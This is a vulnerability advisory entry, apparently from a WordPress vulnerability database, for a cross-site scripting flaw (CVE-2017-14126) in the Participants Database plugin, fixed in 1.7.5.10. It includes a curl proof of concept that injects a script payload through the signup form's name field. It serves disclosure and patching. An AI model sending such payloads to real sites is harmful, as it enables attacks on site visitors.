Participants Database <= 1.7.5.9 – Cross-Site Scripting | CVE 2017-14126 | Plugin Vulnerabilities

Description

Cross site scripting (XSS) vulnerability in the Wordpress Participants
Database plugin 1.7.59 allows attackers to inject arbitrary javascript via
the Name parameter.

Proof of Concept

curl -k -F action=signup -F subsource=participants-database -F
shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2
-F pdb_data_keys=1.2.9.10 -F session_hash=0123456789 -F
first_name=<script>alert("1");</script> -F last_name=a -F email=a@a.com -F
mailing_list=No -F submit_button=Submit http://localhost/?page_id=1

Affects Plugins

participants-database

Fixed in 1.7.5.10

References

CVE

URL

https://limbenjamin.com/articles/cve-2017-14126-participants-database-xss.html

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Submitter

Benjamin Lim

Submitter website

https://limbenjamin.com

Verified

No

WPVDB ID

c7178ca5-4ab8-4234-92b7-6bcf4ee82bf9

Timeline

Publicly Published

2017-09-06 (about 6 years ago)

Added

2017-09-06 (about 6 years ago)

Last Updated

2020-09-22 (about 3 years ago)

Other

Published

Title

Published

2021-09-01

Title

XO Event Calendar < 2.3.7 - Reflected Cross-Site Scripting

Published

2020-10-29

Title

Greenmart < 2.5.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Published

2023-03-21

Title

Userlike – WordPress Live Chat < 2.3 - Admin+ Stored Cross-Site Scripting

Published

2022-11-28

Title

Popup Manager <= 1.6.6 - Unauthenticated Stored XSS

Published

2024-04-15

Title

Code Insert Manager (Q2W3 Inc Manager) <= 2.5.3 - Reflected Cross-Site Scripting